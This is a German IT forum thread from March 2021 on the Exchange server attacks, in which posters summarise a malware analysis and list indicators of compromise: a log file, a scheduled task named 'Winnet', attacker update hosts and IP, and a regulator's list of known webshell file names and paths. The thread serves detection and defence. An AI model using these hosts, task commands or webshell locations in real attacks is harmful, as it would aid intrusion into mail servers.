https://web.archive.org/web/20210309104953/https://gist.github.com/JohnH ...

Er hat die einzelnen Stufen des Codes etwas entzerrt und die durch base64 codierten Abschnitte lesbarer gemacht. Interessant dabei sind vor allem die Techniken und die verwendeten Komponenten. (Der Hack-Programmierer steht auf mimikatz.) Der Exchange dient erst einmal als Angriffsplattform, scannt das gesamte Netzwerk und versucht dann das gesamte AD zu infizieren, wenn es intern nicht entsprechend abgesichert ist. Außerdem wird eine Crypto-Erpressung vorbereitet.

Zu achten ist z.B. auf
temp\\ccc.log
schtasks /run /tn "Winnet"
Updates per 188.166.162.201 und p.esonine.com
(gibt aber noch mehr, wie z.B. cdn.chatcdn.net)
Vieles ist auch Ablenkung im Code. Interessant ist, dass bei den wichtigen Teilen sogar das IEX über strings maskiert wird.

Da Microsoft ja einige Teile gesperrt hat, kannst Du Dir vielleicht auch das dazugehörige Video anschauen. Dort sind auch die entscheidenen Code-Teile zu sehen.
https://www.youtube.com/watch?v=rn-6t7OygGk

Gruß

its
Bitte warten ..
Mitglied: Vision2015
15.03.2021 um 06:27 Uhr
Guten Morgen,

Zitat von @IT-Spezi:

Zitat von @Vision2015:
Danke für die Info, hast du dazu auch eine Quellenangabe, bzw. beispiele welche Verschlüsselungs-Komponenten heruntergeladen werden usw....
nicht alle User, besonders einige Anfänger unter uns, Fehlen solche Infos!

Hallo Frank,

Leider hat Microsoft schon einige Code-Analysen auf github wieder gelöscht.
Siehe auch:
https://www.heise.de/meinung/Kommentar-Microsoft-kann-Exchange-Exploits- ...

Aber zum Glück gibt's zu dem Thema noch etwas.
https://gist.github.com/JohnHammond
https://web.archive.org/web/20210309104953/https://gist.github.com/JohnH ...

Er hat die einzelnen Stufen des Codes etwas entzerrt und die durch base64 codierten Abschnitte lesbarer gemacht. Interessant dabei sind vor allem die Techniken und die verwendeten Komponenten. (Der Hack-Programmierer steht auf mimikatz.) Der Exchange dient erst einmal als Angriffsplattform, scannt das gesamte Netzwerk und versucht dann das gesamte AD zu infizieren, wenn es intern nicht entsprechend abgesichert ist. Außerdem wird eine Crypto-Erpressung vorbereitet.

Super, das sind für den einen oder anderen
Zu achten ist z.B. auf
temp\\ccc.log
schtasks /run /tn "Winnet"
Updates per 188.166.162.201 und p.esonine.com
(gibt aber noch mehr, wie z.B. cdn.chatcdn.net)
Vieles ist auch Ablenkung im Code. Interessant ist, dass bei den wichtigen Teilen sogar das IEX über strings maskiert wird.

Da Microsoft ja einige Teile gesperrt hat, kannst Du Dir vielleicht auch das dazugehörige Video anschauen. Dort sind auch die entscheidenen Code-Teile zu sehen.
https://www.youtube.com/watch?v=rn-6t7OygGk

Super Danke ,das sind für den einen oder anderen brauchbare Infos!

Gruß

its
Frank
Bitte warten ..
Mitglied: IT-Spezi
15.03.2021 um 11:39 Uhr
Hallo,

hier noch ein Nachtrag. Der bayrische LDB hat zu dem Thema noch etwas herausgegeben:
https://lda.bayern.de/media/themen/exchange_security_check_incident_resp ...

U.a. heißt es dort:

Kontrolle der bekannten Verzeichnisse, in denen Webshells abgelegt sein könnten. Die Dateinamender bisher in diesem Zusammenhang aufgedeckten Webshells lauten:
-Web.aspx-Help.aspx
-Document.aspx
-errorEE.aspx
-errorEEE.aspx
-errorEW.aspx
-errorFF.aspx
-healthcheck.aspx
-aspnet_www.aspx
-aspnet_client.aspx
-xx.aspx
-shell.aspx
-aspnet_iisstart.aspx
-one.aspx

Zudem werden Pfade nach Webshells untersucht. Webshells wurden bisher unter folgenden Pfaden beobachtet:
-C:\inetpub\wwwroot\aspnet_client\
-C:\inetpub\wwwroot\aspnet_client\system_web\
-%PROGRAMFILES%\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\
-C:\Exchange\FrontEnd\HttpProxy\owa\auth


Aus meiner Sicht reicht das zwar nicht, wie man anhand der Codeanalyse sehen kann. Aber jede Information hilft.

Gruß

its
Bitte warten ..
Heiß diskutierte Inhalte
Festplatten, SSD, Raid
Festplatte aus defekten Notebook ausgebaut - wird nicht erkannt - Wie gelange ich an meine Daten?
gelöst 1nCoreVor 1 TagFrageFestplatten, SSD, Raid15 Kommentare

Hallo liebe Community, nach 7 Jahren hat mein XMG Notebook seinen Geist aufgegeben In dem Notebook waren zwei Festplatten verbaut (eine für System und ...

Erkennung und -Abwehr
Wie geschickt sich Malware verstecken kann - Ein Beispiel aus der Praxis eines Security Experts
colinardoVor 19 StundenTippErkennung und -Abwehr3 Kommentare

Servus Kollegen und Mitstreiter, da ja in letzter Zeit die Exchange-Lücken die Admin-Landschaft ziemlich aufgewirbelt haben und dabei auch immer mal wieder "sogenannte" Admins ...

Internet
Woher holt sich Android die Kontaktdaten von unbekannten Rufnummern?
gelöst anteNopeVor 1 TagFrageInternet8 Kommentare

Hallo zusammen, seit einiger Zeit merke ich, dass mir mein Android Gerät Namen und Informationen zu mir unbekannten Teilnehmern präsentiert. Soll heißen eine nicht ...

Windows Netzwerk
MS Lizenzierung - externe Scandienstleistung
monstermaniaVor 1 TagFrageWindows Netzwerk9 Kommentare

Hallo Allerseits, ich habe da mal eine Frage an die MS Lizenzspeziallisten. Eine externe Firma soll Scandienstleistungen für uns erledigen. Dazu ist angedacht, dass ...

Exchange Server
Exchange Update CU19 auf CU20 Fehler - Eine weitere Version dieses Produkts ist bereits installiert
gelöst StefanKittelVor 1 TagFrageExchange Server6 Kommentare

Hallo, ich habe hier einen Exchange 2016 mit CU19 (15.1.2176.2). Darauf wollte ich nun CU20 installiert. Download Es erscheint Eine weitere Version dieses Produkts ...

Exchange Server
April 2021 Microsoft Exchange Server Security Updates
FrankVor 1 TagInformationExchange Server2 Kommentare

Microsoft has released security updates for vulnerabilities found in: Exchange Server 2013 Exchange Server 2016 Exchange Server 2019 These updates are available for the ...

Drucker und Scanner
Epson WF-6590 druckt nur cyan und gelb
gelöst ITCrowdSupporterVor 1 TagFrageDrucker und Scanner15 Kommentare

Guten Tag :-) Es geht um einen Epson Workforce Pro WF-6590. Er druckt nur cyan und gelb obwohl neue Originalpatronen für schwarz und magenta ...

Windows 10
Windows 10 Updates im Abgesicherten Modus nicht möglich!
gelöst Yuuto.LucasVor 1 TagFrageWindows 1016 Kommentare

Hallo, ich habe aktuell ein Problem bei einem Kunden Rechner. Bei diesem gibt es Probleme mit dem Soundkarten Treiber hdaudio.inf wegen dem der PC ...